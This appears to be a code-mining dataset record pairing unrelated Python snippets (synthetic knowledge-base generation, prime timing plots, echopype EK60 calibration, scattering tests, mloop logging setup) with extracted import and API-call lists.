argparser.add_argument('--trans-single', type=int, default=0,
help='number of clauses r(X0, X2) :- r(X0, X1), r(X1, X2)')
argparser.add_argument('--trans-diff', type=int, default=0,
help='number of clauses r(X0, X2) :- p(X0, X1), q(X1, X2) (with p,q,r different)')
argparser.add_argument('--dir', type=str, default='../../data/synth/sampled',
help='target directory')
argparser.add_argument('--tag', type=str, default='synth',
help='experiment tag')
args = argparser.parse_args(sys.argv[1:])
cmd = ' '.join(arg for arg in sys.argv[1:])
Ne = args.entities
Nr = args.predicates
test_prob = args.test_prob
arg_density = args.arg_density
fact_prob = args.fact_prob
num_symm = args.symm
num_impl = args.impl
num_impl_inv = args.impl_inv
num_impl_conj = args.impl_conj
num_trans_single = args.trans_single
num_trans_diff = args.trans_diff
testKB = SampleKB(Nr, Ne,
arg_densities=[0, arg_density, 0],
fact_prob=fact_prob,
num_symm=num_symm,
num_impl_inv=num_impl_inv,
num_impl=[0, num_impl, 0],
num_impl_conj=[0, num_impl_conj, 0],
num_trans_single=num_trans_single,
num_trans_diff=num_trans_diff,
seed=seed
).get_kb()
N_original_facts = len(testKB.get_all_facts(of_types=TRAIN_LABEL))
# for fact in testKB.get_all_facts(of_types=TRAIN_LABEL):
# print(fact)
# for clause in testKB.get_formulae_strings():
# print(clause)
testKB.apply_formulae(test_prob=test_prob, sampled_unobserved_per_true=sampled_unobserved_per_true)
#create train / test file for inferbeddings
train_file = os.path.join(args.dir, args.tag + '_train.tsv')
valid_file = os.path.join(args.dir, args.tag + '_valid.tsv')
test_file = os.path.join(args.dir, args.tag + '_test.tsv')
clause_file = os.path.join(args.dir, args.tag + '_clauses.pl')
readme_file = os.path.join(args.dir, args.tag + '_config.txt')
msg = '#file: '+ args.tag + '_config.txt\n'
msg += '#%d original purely random train facts (without formulae)\n'%N_original_facts
train_facts = testKB.get_all_facts(of_types=(TRAIN_LABEL,))
msg +='#%d train facts (after creating rules and adding inferred facts to train set with prob %.3f)\n'%(len(train_facts), 1.-test_prob)
test_facts = testKB.get_all_facts(of_types=(TEST_LABEL,))
test_facts_T = [f for f in test_facts if f[1]]
test_facts_F = [f for f in test_facts if not f[1]]
msg += '#%d test facts (%d True, %d False)\n'%(len(test_facts), len(test_facts_T), len(test_facts_F))
print('\n' + msg)
for clause in testKB.get_formulae_for_ntp_strings():
print(clause)
with open(readme_file, 'w') as rf:
rf.write('\n#command:\npython3 %s\n'%' '.join(list(sys.argv)))
rf.write('\n#config:\n')
for k in ['tag', 'entities', 'predicates', 'test_prob', 'arg_density', 'fact_prob',
'symm', 'impl', 'impl_inv', 'impl_conj', 'trans_single', 'trans_diff',
'dir']:
rf.write('{}\t{}\n'.format(k, vars(args)[k]))
rf.write('seed\t{}\n'.format(seed))
rf.write('sampled_unobserved_per_true\t{}\n'.format(sampled_unobserved_per_true))
rf.write('simple_transitivities\t{}\n'.format(simple_transitivities))
rf.write('\n#stats:\n')
rf.write(msg)
with open(train_file, 'w') as trf:
for fact in sorted(testKB.get_all_facts(of_types=TRAIN_LABEL)):
pred, (subj, obj) = fact[0]
trf.write('{}\t{}\t{}\n'.format(subj, pred, obj))
with open(valid_file, 'w') as vaf:
#simple strategy for artificial setting: tune on train data
#but: for AUC evaluation, we need false train facts as well
# (sampled_unobserved_per_true randomly sampled unobserved ones per positive train fact
nb_pos_test = int(len(testKB.get_all_facts(of_types=TEST_LABEL))/(sampled_unobserved_per_true+1.))
train_facts_True = testKB.get_all_facts(of_types=TRAIN_LABEL)
np.random.shuffle(train_facts_True)
valid_facts_True = train_facts_True #[:nb_pos_test]
valid_facts_False = []
for (pred, (subj, obj)), truth, _ in valid_facts_True:
if truth: #should be the case
vaf.write('{}\t{}\t{}\t{}\n'.format(subj, pred, obj, {True: 1, False: 0}[truth]))
((pred_n, (subj_n, obj_n)), _, _) = testKB.sample_neg(pred, 0, 1, oracle=True)
vaf.write('{}\t{}\t{}\t{}\n'.format(subj_n, pred, obj_n, 0)) #negative fact for same relation
with open(test_file, 'w') as tef:
for fact in sorted(testKB.get_all_facts(of_types=TEST_LABEL)):
pred, (subj, obj) = fact[0]
truth = fact[1]
tef.write('{}\t{}\t{}\t{}\n'.format(subj, pred, obj, {True: 1, False: 0}[truth]))
with open(clause_file, 'w') as clf:
for clause in testKB.get_formulae_for_ntp_strings():
clf.write(clause+'\n')
|
[
"numpy.random.seed",
"argparse.ArgumentParser",
"random.uniform",
"random.sample",
"kb.KB",
"random.seed",
"os.path.join",
"numpy.random.shuffle"
] |
[((7344, 7364), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (7358, 7364), True, 'import numpy as np\n'), ((7398, 7493), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""create artificial dataset (train+test) with rules (all arity 2)"""'], {}), "(\n 'create artificial dataset (train+test) with rules (all arity 2)')\n", (7421, 7493), False, 'import argparse\n'), ((10689, 10736), 'os.path.join', 'os.path.join', (['args.dir', "(args.tag + '_train.tsv')"], {}), "(args.dir, args.tag + '_train.tsv')\n", (10701, 10736), False, 'import os\n'), ((10754, 10801), 'os.path.join', 'os.path.join', (['args.dir', "(args.tag + '_valid.tsv')"], {}), "(args.dir, args.tag + '_valid.tsv')\n", (10766, 10801), False, 'import os\n'), ((10818, 10864), 'os.path.join', 'os.path.join', (['args.dir', "(args.tag + '_test.tsv')"], {}), "(args.dir, args.tag + '_test.tsv')\n", (10830, 10864), False, 'import os\n'), ((10883, 10931), 'os.path.join', 'os.path.join', (['args.dir', "(args.tag + '_clauses.pl')"], {}), "(args.dir, args.tag + '_clauses.pl')\n", (10895, 10931), False, 'import os\n'), ((10950, 10998), 'os.path.join', 'os.path.join', (['args.dir', "(args.tag + '_config.txt')"], {}), "(args.dir, args.tag + '_config.txt')\n", (10962, 10998), False, 'import os\n'), ((1172, 1189), 'random.seed', 'random.seed', (['seed'], {}), '(seed)\n', (1183, 1189), False, 'import random\n'), ((1208, 1221), 'kb.KB', 'KB', ([], {'seed': 'seed'}), '(seed=seed)\n', (1210, 1221), False, 'from kb import KB, TRAIN_LABEL, DEV_LABEL, TEST_LABEL\n'), ((13068, 13103), 'numpy.random.shuffle', 'np.random.shuffle', (['train_facts_True'], {}), '(train_facts_True)\n', (13085, 13103), True, 'import numpy as np\n'), ((2802, 2840), 'random.sample', 'random.sample', (['pairs', 'num_pair_samples'], {}), '(pairs, num_pair_samples)\n', (2815, 2840), False, 'import random\n'), ((2857, 2899), 'random.sample', 'random.sample', (['triples', 'num_triple_samples'], {}), '(triples, num_triple_samples)\n', (2870, 2899), False, 'import random\n'), ((3961, 4026), 'random.sample', 'random.sample', (['[(x, x) for x in relations_per_arity[2]]', 'num_symm'], {}), '([(x, x) for x in relations_per_arity[2]], num_symm)\n', (3974, 4026), False, 'import random\n'), ((4177, 4296), 'random.sample', 'random.sample', (['[(x, y) for x in relations_per_arity[2] for y in relations_per_arity[2] if \n not x == y]', 'num_impl_inv'], {}), '([(x, y) for x in relations_per_arity[2] for y in\n relations_per_arity[2] if not x == y], num_impl_inv)\n', (4190, 4296), False, 'import random\n'), ((4754, 4888), 'random.sample', 'random.sample', (['[(x, y) for x in relations_per_arity[arity] for y in relations_per_arity[\n arity] if not x == y]', 'num_impl[arity - 1]'], {}), '([(x, y) for x in relations_per_arity[arity] for y in\n relations_per_arity[arity] if not x == y], num_impl[arity - 1])\n', (4767, 4888), False, 'import random\n'), ((5403, 5615), 'random.sample', 'random.sample', (['[(x, y, z) for x in relations_per_arity[arity] for y in relations_per_arity\n [arity] for z in relations_per_arity[arity] if not x == y and not y ==\n z and not z == x]', 'num_impl_conj[arity - 1]'], {}), '([(x, y, z) for x in relations_per_arity[arity] for y in\n relations_per_arity[arity] for z in relations_per_arity[arity] if not x ==\n y and not y == z and not z == x], num_impl_conj[arity - 1])\n', (5416, 5615), False, 'import random\n'), ((6154, 6230), 'random.sample', 'random.sample', (['[(x, x, x) for x in relations_per_arity[2]]', 'num_trans_single'], {}), '([(x, x, x) for x in relations_per_arity[2]], num_trans_single)\n', (6167, 6230), False, 'import random\n'), ((6348, 6538), 'random.sample', 'random.sample', (['[(x, y, z) for x in relations_per_arity[2] for y in relations_per_arity[2] for\n z in relations_per_arity[2] if not x == y and not y == z and not z == x]', 'num_trans_diff'], {}), '([(x, y, z) for x in relations_per_arity[2] for y in\n relations_per_arity[2] for z in relations_per_arity[2] if not x == y and\n not y == z and not z == x], num_trans_diff)\n', (6361, 6538), False, 'import random\n'), ((3154, 3176), 'random.uniform', 'random.uniform', (['(0)', '(1.0)'], {}), '(0, 1.0)\n', (3168, 3176), False, 'import random\n')]
|
'''
@author: <NAME>
'''
import time
import numpy as np
import matplotlib.pyplot as plt
from algorithms import primes1, primes2, primes3, primes4, primes5, primes6, primes7, primes8
ubounds = range(0, 10000, 100)
num = len(ubounds)
results = []
for algorithm in (primes1, primes2, primes3, primes4, primes5, primes6, primes7, primes8):
print(f'Testing algorithm {algorithm.__name__}')
results_for_current_algorithm = []
for ubound in ubounds:
starttime = time.time()
result = algorithm(ubound)
endtime = time.time()
duration = endtime - starttime
results_for_current_algorithm.append(duration)
results.append(results_for_current_algorithm)
plt.plot(np.transpose(np.array(results)), linewidth=2)
plt.xticks(range(len(ubounds))[0::10], ubounds[0::10])
plt.xlabel('Upper bound for primes')
plt.ylabel('Time in seconds to generate primes')
plt.legend(['algorithm 1', 'algorithm 2', 'algorithm 3', 'algorithm 4',
'algorithm 5', 'algorithm 6', 'algorithm 7', 'algorithm 8'], loc=2)
plt.show()
|
[
"matplotlib.pyplot.show",
"matplotlib.pyplot.legend",
"time.time",
"numpy.array",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel"
] |
[((812, 848), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Upper bound for primes"""'], {}), "('Upper bound for primes')\n", (822, 848), True, 'import matplotlib.pyplot as plt\n'), ((849, 897), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Time in seconds to generate primes"""'], {}), "('Time in seconds to generate primes')\n", (859, 897), True, 'import matplotlib.pyplot as plt\n'), ((898, 1041), 'matplotlib.pyplot.legend', 'plt.legend', (["['algorithm 1', 'algorithm 2', 'algorithm 3', 'algorithm 4', 'algorithm 5',\n 'algorithm 6', 'algorithm 7', 'algorithm 8']"], {'loc': '(2)'}), "(['algorithm 1', 'algorithm 2', 'algorithm 3', 'algorithm 4',\n 'algorithm 5', 'algorithm 6', 'algorithm 7', 'algorithm 8'], loc=2)\n", (908, 1041), True, 'import matplotlib.pyplot as plt\n'), ((1050, 1060), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1058, 1060), True, 'import matplotlib.pyplot as plt\n'), ((480, 491), 'time.time', 'time.time', ([], {}), '()\n', (489, 491), False, 'import time\n'), ((545, 556), 'time.time', 'time.time', ([], {}), '()\n', (554, 556), False, 'import time\n'), ((724, 741), 'numpy.array', 'np.array', (['results'], {}), '(results)\n', (732, 741), True, 'import numpy as np\n')]
|
"""
echopype data model inherited from based class EchoData for EK60 data.
"""
import datetime as dt
import numpy as np
import xarray as xr
from .echo_data import EchoData
class EchoDataEK60(EchoData):
"""Class for manipulating EK60 echo data that is already converted to netCDF."""
def __init__(self, file_path=""):
EchoData.__init__(self, file_path)
self.tvg_correction_factor = 2 # range bin offset factor for calculating time-varying gain in EK60
def calibrate(self, save=False):
"""Perform echo-integration to get volume backscattering strength (Sv) from EK60 power data.
TODO: need to write a separate method for calculating TS as have been done for AZFP data.
Parameters
-----------
save : bool, optional
whether to save calibrated Sv output
default to ``False``
"""
# Open data set for Environment and Beam groups
ds_env = xr.open_dataset(self.file_path, group="Environment")
ds_beam = xr.open_dataset(self.file_path, group="Beam")
# Derived params
sample_thickness = ds_env.sound_speed_indicative * ds_beam.sample_interval / 2 # sample thickness
wavelength = ds_env.sound_speed_indicative / ds_env.frequency # wavelength
# Calc gain
CSv = 10 * np.log10((ds_beam.transmit_power * (10 ** (ds_beam.gain_correction / 10)) ** 2 *
wavelength ** 2 * ds_env.sound_speed_indicative * ds_beam.transmit_duration_nominal *
10 ** (ds_beam.equivalent_beam_angle / 10)) /
(32 * np.pi ** 2))
# Get TVG and absorption
range_meter = ds_beam.range_bin * sample_thickness - \
self.tvg_correction_factor * sample_thickness # DataArray [frequency x range_bin]
range_meter = range_meter.where(range_meter > 0, other=0) # set all negative elements to 0
TVG = np.real(20 * np.log10(range_meter.where(range_meter != 0, other=1)))
ABS = 2 * ds_env.absorption_indicative * range_meter
# Save TVG and ABS for noise estimation use
self.sample_thickness = sample_thickness
self.TVG = TVG
self.ABS = ABS
# Calibration and echo integration
Sv = ds_beam.backscatter_r + TVG + ABS - CSv - 2 * ds_beam.sa_correction
Sv.name = 'Sv'
# Save calibrated data into the calling instance and
# ... to a separate .nc file in the same directory as the data file
self.Sv = Sv
if save:
print('%s saving calibrated Sv to %s' % (dt.datetime.now().strftime('%H:%M:%S'), self.Sv_path))
Sv.to_netcdf(path=self.Sv_path, mode="w")
# Close opened resources
ds_env.close()
ds_beam.close()
|
[
"numpy.log10",
"xarray.open_dataset",
"datetime.datetime.now"
] |
[((956, 1008), 'xarray.open_dataset', 'xr.open_dataset', (['self.file_path'], {'group': '"""Environment"""'}), "(self.file_path, group='Environment')\n", (971, 1008), True, 'import xarray as xr\n'), ((1027, 1072), 'xarray.open_dataset', 'xr.open_dataset', (['self.file_path'], {'group': '"""Beam"""'}), "(self.file_path, group='Beam')\n", (1042, 1072), True, 'import xarray as xr\n'), ((1330, 1572), 'numpy.log10', 'np.log10', (['(ds_beam.transmit_power * (10 ** (ds_beam.gain_correction / 10)) ** 2 * \n wavelength ** 2 * ds_env.sound_speed_indicative * ds_beam.\n transmit_duration_nominal * 10 ** (ds_beam.equivalent_beam_angle / 10) /\n (32 * np.pi ** 2))'], {}), '(ds_beam.transmit_power * (10 ** (ds_beam.gain_correction / 10)) **\n 2 * wavelength ** 2 * ds_env.sound_speed_indicative * ds_beam.\n transmit_duration_nominal * 10 ** (ds_beam.equivalent_beam_angle / 10) /\n (32 * np.pi ** 2))\n', (1338, 1572), True, 'import numpy as np\n'), ((2620, 2637), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (2635, 2637), True, 'import datetime as dt\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 31 14:42:37 2019
@author: owenmadin
"""
import numpy
from bayesiantesting.kernels.bayes import ThermodynamicIntegration
from bayesiantesting.models.continuous import GaussianModel
def main():
priors = {"uniform": ("uniform", numpy.array([-5.0, 5.0]))}
# Build the model / models.
model = GaussianModel("gaussian", priors, 0.0, 1.0)
# Draw the initial parameter values from the model priors.
initial_parameters = model.sample_priors()
# Run the simulation
simulation = ThermodynamicIntegration(
legendre_gauss_degree=16,
model=model,
warm_up_steps=100000,
steps=500000,
output_directory_path="gaussian",
)
_, integral, error = simulation.run(initial_parameters, number_of_processes=4)
print("Final Integral:", integral, " +/- ", error)
print("==============================")
if __name__ == "__main__":
main()
|
[
"bayesiantesting.kernels.bayes.ThermodynamicIntegration",
"numpy.array",
"bayesiantesting.models.continuous.GaussianModel"
] |
[((377, 420), 'bayesiantesting.models.continuous.GaussianModel', 'GaussianModel', (['"""gaussian"""', 'priors', '(0.0)', '(1.0)'], {}), "('gaussian', priors, 0.0, 1.0)\n", (390, 420), False, 'from bayesiantesting.models.continuous import GaussianModel\n'), ((575, 712), 'bayesiantesting.kernels.bayes.ThermodynamicIntegration', 'ThermodynamicIntegration', ([], {'legendre_gauss_degree': '(16)', 'model': 'model', 'warm_up_steps': '(100000)', 'steps': '(500000)', 'output_directory_path': '"""gaussian"""'}), "(legendre_gauss_degree=16, model=model,\n warm_up_steps=100000, steps=500000, output_directory_path='gaussian')\n", (599, 712), False, 'from bayesiantesting.kernels.bayes import ThermodynamicIntegration\n'), ((305, 329), 'numpy.array', 'numpy.array', (['[-5.0, 5.0]'], {}), '([-5.0, 5.0])\n', (316, 329), False, 'import numpy\n')]
|
from PIL import Image
import numpy as np
img = Image.open('cifar.png')
pic = np.array(img)
noise = np.random.randint(-10,10,pic.shape[-1])
print(noise.shape)
pic = pic+noise
pic = pic.astype(np.uint8)
asd = Image.fromarray(pic)
|
[
"PIL.Image.fromarray",
"numpy.random.randint",
"numpy.array",
"PIL.Image.open"
] |
[((47, 70), 'PIL.Image.open', 'Image.open', (['"""cifar.png"""'], {}), "('cifar.png')\n", (57, 70), False, 'from PIL import Image\n'), ((77, 90), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (85, 90), True, 'import numpy as np\n'), ((99, 140), 'numpy.random.randint', 'np.random.randint', (['(-10)', '(10)', 'pic.shape[-1]'], {}), '(-10, 10, pic.shape[-1])\n', (116, 140), True, 'import numpy as np\n'), ((207, 227), 'PIL.Image.fromarray', 'Image.fromarray', (['pic'], {}), '(pic)\n', (222, 227), False, 'from PIL import Image\n')]
|
import torch
from torch.autograd import Variable
from scattering.scattering1d.utils import pad1D, modulus, subsample_fourier
from scattering.scattering1d.utils import compute_border_indices
import numpy as np
import pytest
def test_pad1D(random_state=42):
"""
Tests the correctness and differentiability of pad1D
"""
torch.manual_seed(random_state)
N = 128
for pad_left in range(0, N, 16):
for pad_right in range(0, N, 16):
x = Variable(torch.randn(100, 4, N), requires_grad=True)
x_pad = pad1D(x, pad_left, pad_right, mode='reflect')
# Check the size
x2 = x.data.clone()
x_pad2 = x_pad.data.clone()
for t in range(1, pad_left + 1):
diff = x_pad2[..., pad_left - t] - x2[..., t]
assert torch.max(torch.abs(diff)) <= 1e-7
for t in range(x2.shape[-1]):
diff = x_pad2[..., pad_left + t] - x2[..., t]
assert torch.max(torch.abs(diff)) <= 1e-7
for t in range(1, pad_right + 1):
diff = x_pad2[..., x_pad.shape[-1] - 1 - pad_right + t]
diff -= x2[..., x.shape[-1] - 1 - t]
assert torch.max(torch.abs(diff)) <= 1e-7
# check the differentiability
loss = 0.5 * torch.sum(x_pad**2)
loss.backward()
# compute the theoretical gradient for x
x_grad_original = x.data.clone()
x_grad = x_grad_original.new(x_grad_original.shape).fill_(0.)
x_grad += x_grad_original
for t in range(1, pad_left + 1):
x_grad[..., t] += x_grad_original[..., t]
for t in range(1, pad_right + 1): # it is counted twice!
t0 = x.shape[-1] - 1 - t
x_grad[..., t0] += x_grad_original[..., t0]
# get the difference
diff = x.grad.data - x_grad
assert torch.max(torch.abs(diff)) <= 1e-7
# Check that the padding shows an error if we try to pad
with pytest.raises(ValueError):
pad1D(x, x.shape[-1], 0, mode='reflect')
with pytest.raises(ValueError):
pad1D(x, 0, x.shape[-1], mode='reflect')
def test_modulus(random_state=42):
"""
Tests the stability and differentiability of modulus
"""
torch.manual_seed(random_state)
# Test with a random vector
x = Variable(torch.randn(100, 4, 128, 2), requires_grad=True)
x_abs = modulus(x)
assert len(x_abs.shape) == len(x.shape) - 1
# check the value
x_abs2 = x_abs.data.clone()
x2 = x.data.clone()
diff = x_abs2 - torch.sqrt(x2[..., 0]**2 + x2[..., 1]**2)
assert torch.max(torch.abs(diff)) <= 1e-7
# check the gradient
loss = torch.sum(x_abs)
loss.backward()
x_grad = x2 / x_abs2.unsqueeze(-1)
diff = x.grad.data - x_grad
assert torch.max(torch.abs(diff)) <= 1e-7
# Test the differentiation with a vector made of zeros
x0 = Variable(torch.zeros(100, 4, 128, 2), requires_grad=True)
x_abs0 = modulus(x0)
loss0 = torch.sum(x_abs0)
loss0.backward()
assert torch.max(torch.abs(x0.grad.data)) <= 1e-7
def test_subsample_fourier(random_state=42):
"""
Tests whether the periodization in Fourier performs a good subsampling
in time
"""
rng = np.random.RandomState(random_state)
J = 10
x = rng.randn(100, 4, 2**J) + 1j * rng.randn(100, 4, 2**J)
x_fft = np.fft.fft(x, axis=-1)[..., np.newaxis]
x_fft.dtype = 'float64' # make it a vector
x_fft_th = torch.from_numpy(x_fft)
for j in range(J + 1):
x_fft_sub_th = subsample_fourier(x_fft_th, 2**j)
x_fft_sub = x_fft_sub_th.numpy()
x_fft_sub.dtype = 'complex128'
x_sub = np.fft.ifft(x_fft_sub[..., 0], axis=-1)
assert np.max(np.abs(x[:, :, ::2**j] - x_sub)) < 1e-7
def test_border_indices(random_state=42):
"""
Tests whether the border indices to unpad are well computed
"""
rng = np.random.RandomState(random_state)
J_signal = 10 # signal lives in 2**J_signal
J = 6 # maximal subsampling
T = 2**J_signal
i0 = rng.randint(0, T // 2 + 1, 1)[0]
i1 = rng.randint(i0 + 1, T, 1)[0]
x = np.ones(T)
x[i0:i1] = 0.
ind_start, ind_end = compute_border_indices(J, i0, i1)
for j in range(J + 1):
assert j in ind_start.keys()
assert j in ind_end.keys()
x_sub = x[::2**j]
# check that we did take the strict interior
assert np.max(x_sub[ind_start[j]:ind_end[j]]) == 0.
# check that we have not forgotten points
if ind_start[j] > 0:
assert np.min(x_sub[:ind_start[j]]) > 0.
if ind_end[j] < x_sub.shape[-1]:
assert np.min(x_sub[ind_end[j]:]) > 0.
|
[
"numpy.abs",
"torch.sqrt",
"numpy.ones",
"torch.randn",
"scattering.scattering1d.utils.subsample_fourier",
"numpy.fft.fft",
"numpy.random.RandomState",
"pytest.raises",
"scattering.scattering1d.utils.modulus",
"numpy.max",
"torch.zeros",
"scattering.scattering1d.utils.pad1D",
"numpy.fft.ifft",
"torch.manual_seed",
"scattering.scattering1d.utils.compute_border_indices",
"numpy.min",
"torch.sum",
"torch.from_numpy",
"torch.abs"
] |
[((335, 366), 'torch.manual_seed', 'torch.manual_seed', (['random_state'], {}), '(random_state)\n', (352, 366), False, 'import torch\n'), ((2321, 2352), 'torch.manual_seed', 'torch.manual_seed', (['random_state'], {}), '(random_state)\n', (2338, 2352), False, 'import torch\n'), ((2463, 2473), 'scattering.scattering1d.utils.modulus', 'modulus', (['x'], {}), '(x)\n', (2470, 2473), False, 'from scattering.scattering1d.utils import pad1D, modulus, subsample_fourier\n'), ((2744, 2760), 'torch.sum', 'torch.sum', (['x_abs'], {}), '(x_abs)\n', (2753, 2760), False, 'import torch\n'), ((3038, 3049), 'scattering.scattering1d.utils.modulus', 'modulus', (['x0'], {}), '(x0)\n', (3045, 3049), False, 'from scattering.scattering1d.utils import pad1D, modulus, subsample_fourier\n'), ((3062, 3079), 'torch.sum', 'torch.sum', (['x_abs0'], {}), '(x_abs0)\n', (3071, 3079), False, 'import torch\n'), ((3315, 3350), 'numpy.random.RandomState', 'np.random.RandomState', (['random_state'], {}), '(random_state)\n', (3336, 3350), True, 'import numpy as np\n'), ((3540, 3563), 'torch.from_numpy', 'torch.from_numpy', (['x_fft'], {}), '(x_fft)\n', (3556, 3563), False, 'import torch\n'), ((3980, 4015), 'numpy.random.RandomState', 'np.random.RandomState', (['random_state'], {}), '(random_state)\n', (4001, 4015), True, 'import numpy as np\n'), ((4209, 4219), 'numpy.ones', 'np.ones', (['T'], {}), '(T)\n', (4216, 4219), True, 'import numpy as np\n'), ((4264, 4297), 'scattering.scattering1d.utils.compute_border_indices', 'compute_border_indices', (['J', 'i0', 'i1'], {}), '(J, i0, i1)\n', (4286, 4297), False, 'from scattering.scattering1d.utils import compute_border_indices\n'), ((2046, 2071), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (2059, 2071), False, 'import pytest\n'), ((2081, 2121), 'scattering.scattering1d.utils.pad1D', 'pad1D', (['x', 'x.shape[-1]', '(0)'], {'mode': '"""reflect"""'}), "(x, x.shape[-1], 0, mode='reflect')\n", (2086, 2121), False, 'from scattering.scattering1d.utils import pad1D, modulus, subsample_fourier\n'), ((2131, 2156), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (2144, 2156), False, 'import pytest\n'), ((2166, 2206), 'scattering.scattering1d.utils.pad1D', 'pad1D', (['x', '(0)', 'x.shape[-1]'], {'mode': '"""reflect"""'}), "(x, 0, x.shape[-1], mode='reflect')\n", (2171, 2206), False, 'from scattering.scattering1d.utils import pad1D, modulus, subsample_fourier\n'), ((2402, 2429), 'torch.randn', 'torch.randn', (['(100)', '(4)', '(128)', '(2)'], {}), '(100, 4, 128, 2)\n', (2413, 2429), False, 'import torch\n'), ((2620, 2665), 'torch.sqrt', 'torch.sqrt', (['(x2[..., 0] ** 2 + x2[..., 1] ** 2)'], {}), '(x2[..., 0] ** 2 + x2[..., 1] ** 2)\n', (2630, 2665), False, 'import torch\n'), ((2976, 3003), 'torch.zeros', 'torch.zeros', (['(100)', '(4)', '(128)', '(2)'], {}), '(100, 4, 128, 2)\n', (2987, 3003), False, 'import torch\n'), ((3437, 3459), 'numpy.fft.fft', 'np.fft.fft', (['x'], {'axis': '(-1)'}), '(x, axis=-1)\n', (3447, 3459), True, 'import numpy as np\n'), ((3614, 3649), 'scattering.scattering1d.utils.subsample_fourier', 'subsample_fourier', (['x_fft_th', '(2 ** j)'], {}), '(x_fft_th, 2 ** j)\n', (3631, 3649), False, 'from scattering.scattering1d.utils import pad1D, modulus, subsample_fourier\n'), ((3744, 3783), 'numpy.fft.ifft', 'np.fft.ifft', (['x_fft_sub[..., 0]'], {'axis': '(-1)'}), '(x_fft_sub[..., 0], axis=-1)\n', (3755, 3783), True, 'import numpy as np\n'), ((547, 592), 'scattering.scattering1d.utils.pad1D', 'pad1D', (['x', 'pad_left', 'pad_right'], {'mode': '"""reflect"""'}), "(x, pad_left, pad_right, mode='reflect')\n", (552, 592), False, 'from scattering.scattering1d.utils import pad1D, modulus, subsample_fourier\n'), ((2683, 2698), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (2692, 2698), False, 'import torch\n'), ((2873, 2888), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (2882, 2888), False, 'import torch\n'), ((3122, 3145), 'torch.abs', 'torch.abs', (['x0.grad.data'], {}), '(x0.grad.data)\n', (3131, 3145), False, 'import torch\n'), ((4492, 4530), 'numpy.max', 'np.max', (['x_sub[ind_start[j]:ind_end[j]]'], {}), '(x_sub[ind_start[j]:ind_end[j]])\n', (4498, 4530), True, 'import numpy as np\n'), ((483, 505), 'torch.randn', 'torch.randn', (['(100)', '(4)', 'N'], {}), '(100, 4, N)\n', (494, 505), False, 'import torch\n'), ((1317, 1338), 'torch.sum', 'torch.sum', (['(x_pad ** 2)'], {}), '(x_pad ** 2)\n', (1326, 1338), False, 'import torch\n'), ((3806, 3839), 'numpy.abs', 'np.abs', (['(x[:, :, ::2 ** j] - x_sub)'], {}), '(x[:, :, ::2 ** j] - x_sub)\n', (3812, 3839), True, 'import numpy as np\n'), ((4635, 4663), 'numpy.min', 'np.min', (['x_sub[:ind_start[j]]'], {}), '(x_sub[:ind_start[j]])\n', (4641, 4663), True, 'import numpy as np\n'), ((4729, 4755), 'numpy.min', 'np.min', (['x_sub[ind_end[j]:]'], {}), '(x_sub[ind_end[j]:])\n', (4735, 4755), True, 'import numpy as np\n'), ((1951, 1966), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (1960, 1966), False, 'import torch\n'), ((834, 849), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (843, 849), False, 'import torch\n'), ((996, 1011), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (1005, 1011), False, 'import torch\n'), ((1225, 1240), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (1234, 1240), False, 'import torch\n')]
|
from pathlib import Path
import numpy as np
from .config import Config
from .spin import Spin
def load(path: Path) -> Config:
with path.open() as file:
lines = file.readlines()
global_optimum, best_solution = lines[0].split(' ')
global_optimum = float(global_optimum.strip())
best_solution = best_solution.strip()
best_solution = [float(gene) for gene in best_solution]
best_solution = np.array(best_solution)
spin_configs = []
for line in lines[2:]:
a_index, b_index, factor = line.split(' ')
a_index = int(a_index)
b_index = int(b_index)
factor = int(factor)
spin_config = Spin(
a_index,
b_index,
factor
)
spin_configs.append(spin_config)
config = Config(
path.name,
global_optimum,
best_solution,
spin_configs
)
return config
|
[
"numpy.array"
] |
[((445, 468), 'numpy.array', 'np.array', (['best_solution'], {}), '(best_solution)\n', (453, 468), True, 'import numpy as np\n')]
|
import lyse
import runmanager.remote as rm
import numpy as np
import mloop_config
import sys
import logging
import os
from labscript_utils.setup_logging import LOG_PATH
try:
from labscript_utils import check_version
except ImportError:
raise ImportError('Require labscript_utils > 2.1.0')
check_version('lyse', '2.5.0', '4.0')
check_version('zprocess', '2.13.1', '4.0')
check_version('labscript_utils', '2.12.5', '4.0')
def configure_logging(config):
console_log_level = config['analysislib_console_log_level']
file_log_level = config['analysislib_file_log_level']
LOG_FILENAME = 'analysislib_mloop.log'
global logger
logger = logging.getLogger('analysislib_mloop')
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(filename)s:%(funcName)s:%(lineno)d:%(levelname)s: %(message)s'
)
# Set up handlers if not already present from previous runs.
if not logger.handlers:
# Set up console handler
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setLevel(console_log_level)
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
# Set up file handler
full_filename = os.path.join(LOG_PATH, LOG_FILENAME)
file_handler = logging.FileHandler(full_filename, mode='w')
file_handler.setLevel(file_log_level)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
logger.debug('Logger configured.')
def check_runmanager(config):
logger.debug('Checking runmanager...')
msgs = []
logger.debug('Getting globals.')
rm_globals = rm.get_globals()
if not all([x in rm_globals for x in config['mloop_params']]):
msgs.append('Not all optimisation parameters present in runmanager.')
logger.debug('Getting run shots state.')
if not rm.get_run_shots():
msgs.append('Run shot(s) not selected in runmanager.')
logger.debug('Checking for errors in globals.')
if rm.error_in_globals():
msgs.append('Error in runmanager globals.')
logger.debug('Checking number of shots.')
n_shots = rm.n_shots()
